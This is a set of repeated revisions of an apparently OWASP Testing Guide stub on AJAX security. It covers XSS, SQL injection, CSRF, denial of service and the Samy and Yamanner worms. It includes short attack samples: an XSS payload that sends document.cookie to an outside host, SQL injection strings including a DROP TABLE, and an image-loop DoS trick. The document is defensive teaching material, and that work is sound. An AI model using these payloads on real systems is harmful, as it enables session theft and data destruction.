<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Yes, it is possible for a rogue or vulnerable application to force a user to launch multiple XMLHttpRequests to a target application, but this has been possible before AJAX. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using <IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"> nested within a JavaScript loop can do the trick more effectively. If anything, I predict poorly thought out infrastructure and application design is likely to cause AJAX applications to inadvertently DOS themselves due to too frequent XMLHttpRequests.

 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. 
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives. Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Recent Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site 
In Samy attack,the XSS Exploit allowed <SCRIPT> in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile 

'''Yahoo! Mail Attack''' In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and Ajax, took advantage of a vulnerability in Yahoo mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which also made it look like an email from a known user.

== Black Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== Gray Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== References ==
'''Whitepapers''' 
... 
'''Tools''' 
... 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]
{{Template:Stub}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-05T19:28:14Z

Anushshetty: /* Recent Attacks */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
Asynchronous Javascript and XML (AJAX) is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its ecurity implications.
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database.
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Yes, it is possible for a rogue or vulnerable application to force a user to launch multiple XMLHttpRequests to a target application, but this has been possible before AJAX. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using <IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"> nested within a JavaScript loop can do the trick more effectively. If anything, I predict poorly thought out infrastructure and application design is likely to cause AJAX applications to inadvertently DOS themselves due to too frequent XMLHttpRequests.

 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. 
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives. Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Recent Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site 
In Samy attack,the XSS Exploit allowed <SCRIPT> in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile 

'''Yahoo! Mail Attack''' The Yamanner worm targeted Yahoo Mail, harvesting e-mail addresses and forwarding itself to all contacts in a user's Yahoo address book.

== Black Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== Gray Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== References ==
'''Whitepapers''' 
... 
'''Tools''' 
... 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]
{{Template:Stub}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-05T19:27:03Z

Anushshetty: /* Recent Attacks */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
Asynchronous Javascript and XML (AJAX) is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its ecurity implications.
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database.
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Yes, it is possible for a rogue or vulnerable application to force a user to launch multiple XMLHttpRequests to a target application, but this has been possible before AJAX. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using <IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"> nested within a JavaScript loop can do the trick more effectively. If anything, I predict poorly thought out infrastructure and application design is likely to cause AJAX applications to inadvertently DOS themselves due to too frequent XMLHttpRequests.

 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. 
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives. Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Recent Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site 
In Samy attack,the XSS Exploit allowed <SCRIPT> in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile 

'''Yahoo! Mail Attack''' The Yamanner worm targeted Yahoo Mail, harvesting e-mail addresses and forwarding itself to all contacts in a user's Yahoo address book.

== Black Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== Gray Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== References ==
'''Whitepapers''' 
... 
'''Tools''' 
... 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]
{{Template:Stub}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-05T19:11:58Z

Anushshetty: /* Attacks and Vulnerabilities */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
Asynchronous Javascript and XML (AJAX) is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its ecurity implications.
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database.
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Yes, it is possible for a rogue or vulnerable application to force a user to launch multiple XMLHttpRequests to a target application, but this has been possible before AJAX. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using <IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"> nested within a JavaScript loop can do the trick more effectively. If anything, I predict poorly thought out infrastructure and application design is likely to cause AJAX applications to inadvertently DOS themselves due to too frequent XMLHttpRequests.

 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. 
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives. Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Recent Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site
'''Yahoo! Mail Attack''' The Yamanner worm targeted Yahoo Mail, harvesting e-mail addresses and forwarding itself to all contacts in a user's Yahoo address book.

== Black Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== Gray Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== References ==
'''Whitepapers''' 
... 
'''Tools''' 
... 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]
{{Template:Stub}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-05T19:05:58Z

Anushshetty: /* Attacks and Vulnerabilities */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
Asynchronous Javascript and XML (AJAX) is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its ecurity implications.
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database.
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Yes, it is possible for a rogue or vulnerable application to force a user to launch multiple XMLHttpRequests to a target application, but this has been possible before AJAX. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using <IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"> nested within a JavaScript loop can do the trick more effectively. If anything, I predict poorly thought out infrastructure and application design is likely to cause AJAX applications to inadvertently DOS themselves due to too frequent XMLHttpRequests.

 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives.

== Recent Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site
'''Yahoo! Mail Attack''' The Yamanner worm targeted Yahoo Mail, harvesting e-mail addresses and forwarding itself to all contacts in a user's Yahoo address book.

== Black Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== Gray Box testing and example ==
'''Testing for Topic X vulnerabilities:''' 
... 
'''Result Expected:''' 
... 
== References ==
'''Whitepapers''' 
... 
'''Tools''' 
... 

{{Category:OWASP Testing Project AoC}}
[[OWASP Testing Guide v2 Table of Contents]]
{{Template:Stub}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-05T19:03:13Z

Anushshetty: /* Examples */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
Asynchronous Javascript and XML (AJAX) is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its ecurity implications.
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database.
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
